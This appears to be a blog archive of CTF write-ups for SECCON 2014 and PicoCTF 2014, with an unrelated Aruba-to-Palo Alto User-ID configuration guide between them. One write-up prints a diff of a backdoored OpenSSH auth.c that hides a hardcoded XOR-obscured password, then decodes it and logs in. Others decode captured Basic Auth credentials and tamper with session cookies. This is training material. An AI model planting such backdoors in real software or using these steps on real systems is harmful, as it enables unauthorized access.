drwxr-xr-x 1 root root 0 Dec 31 1969 TFhmGS
drwxr-xr-x 1 root root 0 Dec 31 1969 u
drwxr-xr-x 1 root root 0 Dec 31 1969 uHuZk04I
drwxr-xr-x 1 root root 0 Dec 31 1969 UivNZ
drwxr-xr-x 1 root root 0 Dec 31 1969 UpVRswF
drwxr-xr-x 1 root root 0 Dec 31 1969 URdRCrZo
drwxr-xr-x 1 root root 0 Dec 31 1969 v
-rw-r–r– 1 root root 9.0K Dec 31 1969 W0HTWw6oxK.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 weH
drwxr-xr-x 1 root root 0 Dec 31 1969 wOImbu
drwxr-xr-x 1 root root 0 Dec 31 1969 xawcc
drwxr-xr-x 1 root root 0 Dec 31 1969 Xde
-rw-r–r– 1 root root 6.0K Dec 31 1969 XM8cUidmtho.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 Xnd5
drwxr-xr-x 1 root root 0 Dec 31 1969 XZn
drwxr-xr-x 1 root root 0 Dec 31 1969 Y
drwxr-xr-x 1 root root 0 Dec 31 1969 YDTfukUo
drwxr-xr-x 1 root root 0 Dec 31 1969 YMrSfm
drwxr-xr-x 1 root root 0 Dec 31 1969 Ys
-rw-r–r– 1 root root 2.5K Dec 31 1969 zBY1I NZU1pc.txt

 

Tried several methods looked through files by date to see if one was modified more recent. looked by file size to see if one stood out as bigger. But in the end running file on every file made some of the files standout. After looking through 3 or 4 of those files the flag was found.

 

run file on all the files to see if anything stands out. See several txt and jpg files. Looking through found a jpg as the flag.

find . -name ‘*’ -exec file {} + | more

./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/05O1rxFMm.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/HjrRoQkK2v.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/chDQpCvsZmlD.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/gcTf6LR8ZR.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh/MVI4LugVpb7qg.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh/uPQpX9Kxm3QEr33zaH.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/7PgIrSa.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/GhIMarfKkrrB.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/lkjhwerle.jpg: JPEG image data, JFIF standard 1.01
./poiuy7Xdb/7yknXuW/gDObUWcZZG: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5/HuD6lKeYHl.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5/z9XJfuFfqIXSU.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/5ErUBUSL3uNc.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/5zOfI0qlna9R.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/EfRU5k8r.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/ILK9wXbmeS9DKOL.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/gymTmPz.JPG: data

 

 

The file was ./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/lkjhwerle.jpg:                          JPEG image data, JFIF standard 1.01

flag{f0rens!cs!sC00l}

 

SECCON 2014

SECCON 2014 took place last weekend and again part of my CTF was able to participate. For this most part I felt this was a well run CTF. The biggest issue I noticed was with the web challenges.  There were issues with required DLL’s and the like that caused a lot of conversation in the IRC channel. I didnt work on any of those challenges so I cant speak to it first hand. But there was a nice mix of challenges even QR challenges.

 

Challenges :

Welcome to SECCON Start 100 / 100
Easy Cipher Crypto 100 / 100
Decrypt it (Easy) Crypto 0 / 200
Decrypt it (Hard) Crypto 0 / 300
Ms.Fortune? Misfortune. : 4096-bit RSA Crypto 0 / 400
Shuffle Binary 100 / 100
Reverse it Binary 0 / 100
Let’s disassemble Binary 0 / 200
Advanced RISC Machine Exploit 0 / 300
ROP: Impossible Exploit 0 / 500
Holy shellcode Exploit 0 / 400
Japanese super micro-controller Exploit 0 / 500
jspuzzle Web 0 / 100
REA-JUU WATCH Web 200 / 200
Bleeding “Heartbleed” Test Web Web 0 / 300
Binary Karuta Web 0 / 400
XSS Bonsai (aka. Hakoniwa XSS Reloaded) Web 0 / 500
QR (Easy) QR 0 / 200
SECCON Wars: The Flag Awakens QR 0 / 300
BBQR QR 0 / 400
Get the key.txt Forensics 100 / 100
Read it Forensics 0 / 300
UnknownFS Forensics 0 / 400
Confused analyte Forensics 0 / 500
Choose the number Programming 100 / 100
The Golden Gate Programming 0 / 400
Get the key Network 100 / 100
Get from curious “FTP” server Network 0 / 300
version2 Network 0 / 200

 

Here are the notes for some of the challenges I solved.

Get the key  – 100

found web http session in provided PCAP.  Basic authentication

GET /nw100/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP,en-US;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 133.242.224.21:6809
Authorization: Basic c2VjY29uMjAxNDpZb3VyQmF0dGxlRmllbGQ=
Connection: Keep-Alive
DNT: 1

HTTP/1.1 200 OK
Date: Sat, 29 Nov 2014 13:10:48 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 450
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 3.2 Final//EN”>
<html>
<head>
<title>Index of /nw100</title>
</head>
<body>
<h1>Index of /nw100</h1>
<table><tr><th><img src=”/icons/blank.gif” alt=”[ICO]”></th><th><a href=”?C=N;O=D”>Name</a></th><th><a href=”?C=M;O=A”>Last modified</a></th><th><a href=”?C=S;O=A”>Size</a></th><th><a href=”?C=D;O=A”>Description</a></th></tr><tr><th colspan=”5″><hr></th></tr>
<tr><td valign=”top”><img src=”/icons/back.gif” alt=”[DIR]”></td><td><a href=”/”>Parent Directory</a></td><td>&nbsp;</td><td align=”right”> – </td><td>&nbsp;</td></tr>
<tr><td valign=”top”><img src=”/icons/text.gif” alt=”[TXT]”></td><td><a href=”key.html”>key.html</a></td><td align=”right”>29-Nov-2014 22:04 </td><td align=”right”> 45 </td><td>&nbsp;</td></tr>
<tr><th colspan=”5″><hr></th></tr>
</table>
<address>Apache/2.2.22 (Debian) Server at 133.242.224.21 Port 6809</address>
</body></html>
take info and decrypt base64 key

seccon2014:YourBattleField
goto web site and enter login

http://133.242.224.21:6809/nw100/key.html

get flag

SECCON{Basic_NW_Challenge_Done!}

————————————————————————————————–

Shuffle – 100
Load into hopper look at main function convert each mov eax to characters

Dump of assembler code for function main:
0x0804852d <+0>: push ebp
0x0804852e <+1>: mov ebp,esp
0x08048530 <+3>: push esi
0x08048531 <+4>: push ebx
0x08048532 <+5>: and esp,0xfffffff0
0x08048535 <+8>: sub esp,0x50
0x08048538 <+11>: mov eax,DWORD PTR [ebp+0xc]
0x0804853b <+14>: mov DWORD PTR [esp+0xc],eax
0x0804853f <+18>: mov eax,gs:0x14
0x08048545 <+24>: mov DWORD PTR [esp+0x4c],eax
0x08048549 <+28>: xor eax,eax
0x0804854b <+30>: mov eax,0x53
0x08048550 <+35>: mov BYTE PTR [esp+0x24],al
0x08048554 <+39>: mov eax,0x45
0x08048559 <+44>: mov BYTE PTR [esp+0x25],al
0x0804855d <+48>: mov eax,0x43
0x08048562 <+53>: mov BYTE PTR [esp+0x26],al
0x08048566 <+57>: mov eax,0x43
0x0804856b <+62>: mov BYTE PTR [esp+0x27],al
0x0804856f <+66>: mov eax,0x4f
0x08048574 <+71>: mov BYTE PTR [esp+0x28],al
0x08048578 <+75>: mov eax,0x4e
0x0804857d <+80>: mov BYTE PTR [esp+0x29],al
0x08048581 <+84>: mov eax,0x7b
0x08048586 <+89>: mov BYTE PTR [esp+0x2a],al
0x0804858a <+93>: mov eax,0x57
0x0804858f <+98>: mov BYTE PTR [esp+0x2b],al
0x08048593 <+102>: mov eax,0x65
0x08048598 <+107>: mov BYTE PTR [esp+0x2c],al
0x0804859c <+111>: mov eax,0x6c
0x080485a1 <+116>: mov BYTE PTR [esp+0x2d],al
0x080485a5 <+120>: mov eax,0x63
0x080485aa <+125>: mov BYTE PTR [esp+0x2e],al
0x080485ae <+129>: mov eax,0x6f
0x080485b3 <+134>: mov BYTE PTR [esp+0x2f],al
0x080485b7 <+138>: mov eax,0x6d
0x080485bc <+143>: mov BYTE PTR [esp+0x30],al
0x080485c0 <+147>: mov eax,0x65
0x080485c5 <+152>: mov BYTE PTR [esp+0x31],al
0x080485c9 <+156>: mov eax,0x20
0x080485ce <+161>: mov BYTE PTR [esp+0x32],al
0x080485d2 <+165>: mov eax,0x74
0x080485d7 <+170>: mov BYTE PTR [esp+0x33],al
0x080485db <+174>: mov eax,0x6f
0x080485e0 <+179>: mov BYTE PTR [esp+0x34],al
0x080485e4 <+183>: mov eax,0x20
0x080485e9 <+188>: mov BYTE PTR [esp+0x35],al
0x080485ed <+192>: mov eax,0x74
0x080485f2 <+197>: mov BYTE PTR [esp+0x36],al
0x080485f6 <+201>: mov eax,0x68
0x080485fb <+206>: mov BYTE PTR [esp+0x37],al
0x080485ff <+210>: mov eax,0x65
0x08048604 <+215>: mov BYTE PTR [esp+0x38],al
0x08048608 <+219>: mov eax,0x20
0x0804860d <+224>: mov BYTE PTR [esp+0x39],al
0x08048611 <+228>: mov eax,0x53
0x08048616 <+233>: mov BYTE PTR [esp+0x3a],al
0x0804861a <+237>: mov eax,0x45
0x0804861f <+242>: mov BYTE PTR [esp+0x3b],al
0x08048623 <+246>: mov eax,0x43
0x08048628 <+251>: mov BYTE PTR [esp+0x3c],al
0x0804862c <+255>: mov eax,0x43
0x08048631 <+260>: mov BYTE PTR [esp+0x3d],al
0x08048635 <+264>: mov eax,0x4f
0x0804863a <+269>: mov BYTE PTR [esp+0x3e],al
0x0804863e <+273>: mov eax,0x4e
0x08048643 <+278>: mov BYTE PTR [esp+0x3f],al
0x08048647 <+282>: mov eax,0x20
0x0804864c <+287>: mov BYTE PTR [esp+0x40],al
0x08048650 <+291>: mov eax,0x32
0x08048655 <+296>: mov BYTE PTR [esp+0x41],al
0x08048659 <+300>: mov eax,0x30
0x0804865e <+305>: mov BYTE PTR [esp+0x42],al
0x08048662 <+309>: mov eax,0x31
0x08048667 <+314>: mov BYTE PTR [esp+0x43],al
0x0804866b <+318>: mov eax,0x34
0x08048670 <+323>: mov BYTE PTR [esp+0x44],al
0x08048674 <+327>: mov eax,0x20
0x08048679 <+332>: mov BYTE PTR [esp+0x45],al
0x0804867d <+336>: mov eax,0x43
0x08048682 <+341>: mov BYTE PTR [esp+0x46],al
0x08048686 <+345>: mov eax,0x54
0x0804868b <+350>: mov BYTE PTR [esp+0x47],al
0x0804868f <+354>: mov eax,0x46
0x08048694 <+359>: mov BYTE PTR [esp+0x48],al
0x08048698 <+363>: mov eax,0x21
0x0804869d <+368>: mov BYTE PTR [esp+0x49],al
0x080486a1 <+372>: mov eax,0x7d
0x080486a6 <+377>: mov BYTE PTR [esp+0x4a],al
0x080486aa <+381>: mov eax,0x0
0x080486af <+386>: mov BYTE PTR [esp+0x4b],al
0x080486b3 <+390>: mov DWORD PTR [esp],0x0
0x080486ba <+397>: call 0x80483b0 <time@plt>
0x080486bf <+402>: mov ebx,eax
0x080486c1 <+404>: call 0x80483d0 <getpid@plt>
0x080486c6 <+409>: add eax,ebx
0x080486c8 <+411>: mov DWORD PTR [esp],eax
0x080486cb <+414>: call 0x8048400 <srand@plt>
0x080486d0 <+419>: mov DWORD PTR [esp+0x14],0x0
0x080486d8 <+427>: jmp 0x8048769 <main+572>
0x080486dd <+432>: call 0x8048420 <rand@plt>
0x080486e2 <+437>: mov ecx,eax
0x080486e4 <+439>: mov edx,0xcccccccd
0x080486e9 <+444>: mov eax,ecx
0x080486eb <+446>: mul edx
0x080486ed <+448>: shr edx,0x5
0x080486f0 <+451>: mov eax,edx
0x080486f2 <+453>: shl eax,0x2
0x080486f5 <+456>: add eax,edx
0x080486f7 <+458>: shl eax,0x3
0x080486fa <+461>: sub ecx,eax
0x080486fc <+463>: mov edx,ecx
0x080486fe <+465>: mov DWORD PTR [esp+0x18],edx
0x08048702 <+469>: call 0x8048420 <rand@plt>
0x08048707 <+474>: mov ecx,eax
0x08048709 <+476>: mov edx,0xcccccccd
0x0804870e <+481>: mov eax,ecx
0x08048710 <+483>: mul edx
0x08048712 <+485>: shr edx,0x5
0x08048715 <+488>: mov eax,edx
0x08048717 <+490>: shl eax,0x2
0x0804871a <+493>: add eax,edx
0x0804871c <+495>: shl eax,0x3
0x0804871f <+498>: sub ecx,eax
0x08048721 <+500>: mov edx,ecx
0x08048723 <+502>: mov DWORD PTR [esp+0x1c],edx
0x08048727 <+506>: lea edx,[esp+0x24]
0x0804872b <+510>: mov eax,DWORD PTR [esp+0x18]
0x0804872f <+514>: add eax,edx
0x08048731 <+516>: movzx eax,BYTE PTR [eax]
0x08048734 <+519>: movsx eax,al
0x08048737 <+522>: mov DWORD PTR [esp+0x20],eax
0x0804873b <+526>: lea edx,[esp+0x24]
0x0804873f <+530>: mov eax,DWORD PTR [esp+0x1c]
0x08048743 <+534>: add eax,edx
0x08048745 <+536>: movzx eax,BYTE PTR [eax]
0x08048748 <+539>: lea ecx,[esp+0x24]
0x0804874c <+543>: mov edx,DWORD PTR [esp+0x18]
0x08048750 <+547>: add edx,ecx
0x08048752 <+549>: mov BYTE PTR [edx],al
0x08048754 <+551>: mov eax,DWORD PTR [esp+0x20]
0x08048758 <+555>: lea ecx,[esp+0x24]
0x0804875c <+559>: mov edx,DWORD PTR [esp+0x1c]
0x08048760 <+563>: add edx,ecx
0x08048762 <+565>: mov BYTE PTR [edx],al
0x08048764 <+567>: add DWORD PTR [esp+0x14],0x1
0x08048769 <+572>: cmp DWORD PTR [esp+0x14],0x63
0x0804876e <+577>: jle 0x80486dd <main+432>
0x08048774 <+583>: lea eax,[esp+0x24]
0x08048778 <+587>: mov DWORD PTR [esp],eax
0x0804877b <+590>: call 0x80483e0 <puts@plt>
0x08048780 <+595>: mov eax,0x0
0x08048785 <+600>: mov esi,DWORD PTR [esp+0x4c]
0x08048789 <+604>: xor esi,DWORD PTR gs:0x14
0x08048790 <+611>: je 0x8048797 <main+618>
0x08048792 <+613>: call 0x80483c0 <__stack_chk_fail@plt>
0x08048797 <+618>: lea esp,[ebp-0x8]
0x0804879a <+621>: pop ebx
0x0804879b <+622>: pop esi
0x0804879c <+623>: pop ebp
0x0804879d <+624>: ret

flag is SECCON{Welcome to the SECCON 2014 CTF!}

 

——————————————————–

Easy Cipher – 100

Pulled out the extended ASCII chart to decrypt. This was a mix of dec hex and oct.

87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 0123 69 67 0103 1001111
w   e   l    c     o    m   e        t   o            t   h     e        S    E  C   C    O
1001110 040 062 060 49 064 100000 0157 110 6c 0151 1101110 101 040 0103 1010100 70 101110 0124
N          2   0   1  4           o   n   l   i     e
1101000 101 100000 1010011 1000101 67 0103 4f 4e 100000 105 1110011 040 116 1101000 0145 040 1100010 0151 103 103 0145 1110011 0164 100000 1101000 0141 99 6b 1100101 0162 32 0143 111 1101110 1110100 101 0163 0164 040 0151 0156 040 74 0141 1110000 1100001 0156 056 4f 0157 0160 115 44 040 0171 1101111 117 100000 1110111 0141 0156 1110100 32 0164 6f 32 6b 1101110 1101111 1110111 100000 0164 1101000 0145 040 0146 6c 97 1100111 2c 100000 0144 111 110 100111 116 100000 1111001 6f 117 63 0110 1100101 0162 0145 100000 1111001 111 117 100000 97 114 0145 46 1010011 0105 0103 67 79 1001110 123 87 110011 110001 67 110000 1001101 32 55 060 100000 110111 0110 110011 32 53 51 0103
N     {   W   3      1     C   0       M        7  0            7    H       3      5  3  C
0103 060 0116 040 5a 0117 73 0101 7d 1001000 0141 1110110 1100101 100000 102 0165 0156 33
C   0    N       Z   O   I   A   }

 

SECCON{W31C0M 70 7H3 53CC0N ZOIA}

 

—————————–
find the key.txt  – 100

# mount -o loop forensic100 /media/test/
# ls /media/test/
1 109 119 129 139 149 159 169 179 189 199 208 218 228 238 28 38 48 58 68 78 88 98
10 11 12 13 14 15 16 17 18 19 2 209 219 229 239 29 39 49 59 69 79 89 99
100 110 120 130 140 150 160 170 180 190 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
101 111 121 131 141 151 161 171 181 191 200 210 220 230 240 30 40 50 60 70 80 90
102 112 122 132 142 152 162 172 182 192 201 211 221 231 241 31 41 51 61 71 81 91
103 113 123 133 143 153 163 173 183 193 202 212 222 232 242 32 42 52 62 72 82 92
104 114 124 134 144 154 164 174 184 194 203 213 223 233 243 33 43 53 63 73 83 93
105 115 125 135 145 155 165 175 185 195 204 214 224 234 244 34 44 54 64 74 84 94
106 116 126 136 146 156 166 176 186 196 205 215 225 235 25 35 45 55 65 75 85 95
107 117 127 137 147 157 167 177 187 197 206 216 226 236 26 36 46 56 66 76 86 96
108 118 128 138 148 158 168 178 188 198 207 217 227 237 27 37 47 57 67 77 87 97

# file 1
1: gzip compressed data, was “key.txt”, from Unix, last modified: Wed Oct 1 01:00:52 2014

# file 10
10: gzip compressed data, was “key106.txt”, from Unix, last modified: Wed Oct 1 00:59:41 2014
root@kali:/media/test# gunzip 1
gzip: 1: unknown suffix — ignored
# mv 1 1.gz
# ls
10 11 12 13 14 15 16 17 18 19 1.gz 208 218 228 238 28 38 48 58 68 78 88 98
100 110 120 130 140 150 160 170 180 190 2 209 219 229 239 29 39 49 59 69 79 89 99
101 111 121 131 141 151 161 171 181 191 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
102 112 122 132 142 152 162 172 182 192 200 210 220 230 240 30 40 50 60 70 80 90
103 113 123 133 143 153 163 173 183 193 201 211 221 231 241 31 41 51 61 71 81 91
104 114 124 134 144 154 164 174 184 194 202 212 222 232 242 32 42 52 62 72 82 92
105 115 125 135 145 155 165 175 185 195 203 213 223 233 243 33 43 53 63 73 83 93
106 116 126 136 146 156 166 176 186 196 204 214 224 234 244 34 44 54 64 74 84 94
107 117 127 137 147 157 167 177 187 197 205 215 225 235 25 35 45 55 65 75 85 95
108 118 128 138 148 158 168 178 188 198 206 216 226 236 26 36 46 56 66 76 86 96
109 119 129 139 149 159 169 179 189 199 207 217 227 237 27 37 47 57 67 77 87 97
# file 1.gz
1.gz: gzip compressed data, was “key.txt”, from Unix, last modified: Wed Oct 1 01:00:52 2014
# gunzip 1.gz
# ls
1 109 119 129 139 149 159 169 179 189 199 208 218 228 238 28 38 48 58 68 78 88 98
10 11 12 13 14 15 16 17 18 19 2 209 219 229 239 29 39 49 59 69 79 89 99
100 110 120 130 140 150 160 170 180 190 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
101 111 121 131 141 151 161 171 181 191 200 210 220 230 240 30 40 50 60 70 80 90
102 112 122 132 142 152 162 172 182 192 201 211 221 231 241 31 41 51 61 71 81 91
103 113 123 133 143 153 163 173 183 193 202 212 222 232 242 32 42 52 62 72 82 92
104 114 124 134 144 154 164 174 184 194 203 213 223 233 243 33 43 53 63 73 83 93
105 115 125 135 145 155 165 175 185 195 204 214 224 234 244 34 44 54 64 74 84 94
106 116 126 136 146 156 166 176 186 196 205 215 225 235 25 35 45 55 65 75 85 95
107 117 127 137 147 157 167 177 187 197 206 216 226 236 26 36 46 56 66 76 86 96
108 118 128 138 148 158 168 178 188 198 207 217 227 237 27 37 47 57 67 77 87 97
# file 1
1: ASCII text
# cat 1
SECCON{@]NL7n+-s75FrET]vU=7Z}

 

 

 

Import Aruba Networks 802.1x USER-ID to Palo Alto Network via syslog

This document outlines the steps needed to import user-id information from an Aruba Networks controller to a Palo Alto Network firewall directly using syslog.

First step is to setup the Aruba controller to log user login/logout and send to a remote syslog server.

Login to the Aruba Networks Controller Web Interface.

Aruba-login

Click on the Configuration tab and select clock from the left hand menu. Make sure an NTP server is setup for the proper time zone to match the Palo Alto firewall.

Aruba-NTP

Next click the logging menu item on the left hand side. Add a new logging server using the management interface of the Palo Alto Network firewall to receive the User-ID information. Multiple can be added if needed.

aruba-add-SNMP-server

Next click the levels tab. Click the User logs check box, Captive portal and dot1x. Select the informational logging level and click done and apply. Also make sure to save the changes.

Aruba-SNMP-logging-level

Next we want to validate the logging information. To do this access the CLI of the Aruba Networks controller. Via console or SSH. Enter enable mode. Once logged into the controller login to an 802.1x authenticated wireless network then type

show user log 20

You should see logging information similar to below. If you see this info we know proper authentication logging is taking place and the syntax of the log.

Aruba-show-user-log

The Aruba portion of the setup should now be complete. Now login to the Web interface of the Palo Alto Networks firewall.

Once logged in click on the device tab. Then click the setup menu item. Make sure the proper time zone is set under the general settings.

Now click on the Services tab and make sure you are using the same NTP server as the Aruba Networks controller.

Next we will make sure the user-id syslog is allowed on the management interface. Go back to the management tab and select Management interface setting. Make sure USER-ID and USER-ID Syslog Listener-UDP is checked.

[SETTINGS IMAGE]

Now we need to setup the user-id syslog filter. Select the User Identification menu item on the left hand side. Next select the Palo Alto Networks User ID Agent Setup settings and click the Syslog Filters Tab.

[image]

Click add on the bottom to create a new filter. Enter a profile name and description and select Field Identifier. Now based on the log information from the Aruba Networks logs fill out the required boxes. From our log sample we have and event string of Authentication Successful a Username Prefix of username= an address prefix of IP= and the Delimiters are \s

[image]

Click ok twice to return to the main User Mappings tab. Now under Server Monitoring click add. Give the monitor a name such as Aruba controller. Click enable. Select the type of Syslog Sender. Enter the IP address of the Aruba controller under network address. Select the connection type of UDP. Now select the filter you just created and enter the default domain name used.

[image]

Now commit and save your changes.

Next login to the CLI of the Palo Alto Network firewall and type

show user server-monitor state all

You should see auth success messages here when a user connects to an 802.1x SSID.

 

You can also type
show user ip-user-mapping all

And you should see user-id information and SYSLOG in the from field for a successful deployment.

 

 

PicoCTF 2014

Pico CTF 2014 finished up last week. It was a nice CTF running for about 2 weeks. This CTF was designed for middle and high school students. Challenges started out fairly easy compared to your average CTF but did get harder as you went along. I dare say many of the 100 plus point challenges are on par with many other CTF challenges.  Below I am going to include some quick writeup. Their were a huge number of challenges and my team was in and out of the CTF as time permits and since we could not be ranked was not a high priority. The write ups below are just the ones I personally did my team completed many more.

 

SSH BACK DOOR – 100

Some hackers have broken into my server backdoor.picoctf.com and locked my user out (my username is jon). I need to retrieve the flag.txt file from my home directory.
The last thing we noticed in out network logs show is the attacker downloading this. Can you figure out a way to get back into my account?

ssh jon@backdoor.picoctf.com
The authenticity of host ‘backdoor.picoctf.com (23.21.109.77)’ can’t be established.
ECDSA key fingerprint is 6d:3c:3a:7f:3e:04:97:85:84:78:83:d8:52:05:79:4e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘backdoor.picoctf.com,23.21.109.77’ (ECDSA) to the list of known hosts.
jon@backdoor.picoctf.com’s password:
download original tar.gz and run diff
diff hack orginginal/
diff hack/auth.c orginginal/auth.c
777,794d776
<
< static int frobcmp(const char *chk, const char *str) {
< int rc = 0;
< size_t len = strlen(str);
< char *s = xstrdup(str);
< memfrob(s, len);
<
< if (strcmp(chk, s) == 0) {
< rc = 1;
< }
<
< free(s);
< return rc;
< }
<
< int check_password(const char *password) {
< return frobcmp(“CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY”, password);
< }
diff hack/auth.h orginginal/auth.h
214,215d213
< int check_password(const char *);
<
diff hack/auth-passwd.c orginginal/auth-passwd.c
115,117d114
< if (check_password(password)) {
< return ok;
< }

after much google and talks with teammates I found an explanation to the frobcmp function

The memfrob() function encrypts the first n bytes of the memory area s by exclusive-ORing each character with the number 42. The effect can be reversed by using memfrob() on the encrypted memory area.
Note that this function is not a proper encryption routine as the XOR constant is fixed, and is only suitable for hiding strings.

so convert each letter in the password to decimal
XOR with 42
and convert back to ascii

original
CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY
decimal version
67 71 67 68 83 69 95 88 71 75 73 66 67 68 79 89 94 79 75 70 67 68 77 83 69 95 88 76 70 75 77 89
xor with 42
105 109 105 110 121 111 117 114 109 97 99 104 105 110 101 115 116 101 97 108 105 110 103 121 111 117 114 102 108 97 103 115
converted to ascii
i m i n y o u r m a c h i n e s t e a l i n g y o u r f l a g s
final ssh password
iminyourmachinestealingyourflags

login as jon via ssh and get flag
~/CTF/2014-picoctf/write right# ssh jon@backdoor.picoctf.com
jon@backdoor.picoctf.com’s password:
Last login: Wed Oct 29 01:16:37 2014 from pool-74-102-33-54.nwrknj.fios.verizon.net
jon@ip-10-45-162-116:~$ ls
flag.txt
jon@ip-10-45-162-116:~$ cat flag.txt
ssshhhhh_theres_a_backdoor
jon@ip-10-45-162-116:~$

 

Redacted – 50

You found a letter that may shed light on recent events.

Lets look at meta data

<original image>https://picoctf.com/problem-static/forensics/redacted/Redacted.pdf

exiftool Redacted.pdf
ExifTool Version Number : 8.60
File Name : Redacted.pdf
Directory : .
File Size : 879 kB
File Modification Date/Time : 2014:10:27 12:10:11-04:00
File Permissions : rw-r–r–
File Type : PDF
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
XMP Toolkit : XMP Core 5.4.0
Thumbnail Image : (Binary data 12625 bytes, use -b option to extract)
Thumbnail Width : 212
Thumbnail Height : 256
Thumbnail Format : JPEG
Metadata Date : 2014:10:25 16:28:24-04:00
Creator Tool : Adobe Illustrator CC 2014 (Macintosh)
Derived From Rendition Class : proof:pdf
Derived From Document ID : xmp.did:1b6690ed-28a8-c141-9479-b6a9cf6be651
Derived From Instance ID : uuid:d1c078a0-2746-42b2-b0d1-25aedff8fb1e
Derived From Original Document ID: uuid:5D20892493BFDB11914A8590D31508C8
Version ID : 1
Instance ID : uuid:4ab06236-d455-3341-afad-bba7a24d434b
History Software Agent : Adobe Illustrator CC 2014 (Macintosh)
History Changed : /
History When : 2014:10:25 16:28:15-04:00
History Instance ID : xmp.iid:533d6706-603a-42d6-978a-a21cc3522efd
History Action : saved
Document ID : xmp.did:533d6706-603a-42d6-978a-a21cc3522efd
Rendition Class : proof:pdf
Manifest Link Form : EmbedByReference
Manifest Reference Document ID : 0
Manifest Reference Instance ID : 0
Manifest Reference File Path : /Users/ryan/Desktop/Redacted1.png
Ingredients Document ID : 0
Ingredients Instance ID : 0
Ingredients File Path : /Users/ryan/Desktop/Redacted1.png
Original Document ID : uuid:5D20892493BFDB11914A8590D31508C8
N Pages : 1
Swatch Groups Group Name : Brights
Swatch Groups Group Type : 1
Swatch Groups Colorants Yellow : 0.003100
Swatch Groups Colorants Mode : CMYK
Swatch Groups Colorants Black : 0.003100
Swatch Groups Colorants Swatch Name: C=60 M=90 Y=0 K=0
Swatch Groups Colorants Cyan : 60.000000
Swatch Groups Colorants Magenta : 90.000000
Swatch Groups Colorants Type : PROCESS
Has Visible Transparency : False
Plate Names : Cyan, Magenta, Yellow, Black
Max Page Size W : 612.000000
Max Page Size H : 792.000000
Max Page Size Unit : Pixels
Has Visible Overprint : False
Format : application/pdf
Startup Profile : Print
GTS PDFX Version : PDF/X-1:2001
GTS PDFX Conformance : PDF/X-1a:2001
Trapped : False
Page Count : 1
Title : Redacted2
Producer : Mac OS X 10.9.5 Quartz PDFContext
Creator : Adobe Illustrator CC 2014 (Macintosh)
Create Date : 2014:10:25 20:30:54Z
Modify Date : 2014:10:25 20:30:54Z
Looks like this was originally an adobe illustrator document

Lets see if we can pull out the images

pdfimages -j Redacted.pdf out

<clean image>

there it is the secret one_two_three_four

 

Intercepted Post – 40

We intercepted some of your Dad’s web activity. Can you get a password from his traffic?. You can also view the traffic on CloudShark.

<packet image>

found
flag%7Bpl%24_%24%24l_y0ur_l0g1n_form%24%7D
doesnt work. convert from ascii character codes.
flag{pl$_$$l_y0ur_l0g1n_form$}

complete

Delicious! – 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?

page displays

Welcome! You’ve been here before.
Your session number is 67.
We’ll be tracking you using this number whenever you visit this site.
You’re not logged in. There are currently too many users logged in, so you will have to come back later to log in.
use burp suite to edit cookies and send with repeater. tried many 65 was the key.

< burp image>

Flag is session_cookies_are_the_most_delicious

 

Function Address – 60

We found this program file on some systems. But we need the address of the ‘find_string’ function to do anything useful! Can you find it for us?

open file with objdump and grep for function

objdump -d problem | grep find_string
08048444 <find_string>:
8048496: eb 29 jmp 80484c1 <find_string+0x7d>
80484b6: 75 05 jne 80484bd <find_string+0x79>
80484bb: eb 1a jmp 80484d7 <find_string+0x93>
80484d0: 7d c6 jge 8048498 <find_string+0x54>
8048511: e8 2e ff ff ff call 8048444 <find_string>
flag is 08048444

 

snapchat – 80

It was found that a Daedalus employee was storing his personal files on a work computer. Unfortunately, he corrupted the filesystem before we could prove it. Can you take a look? Download here.
recover data

foremost -i disk.img -o file.img
Processing: disk.img
|*|
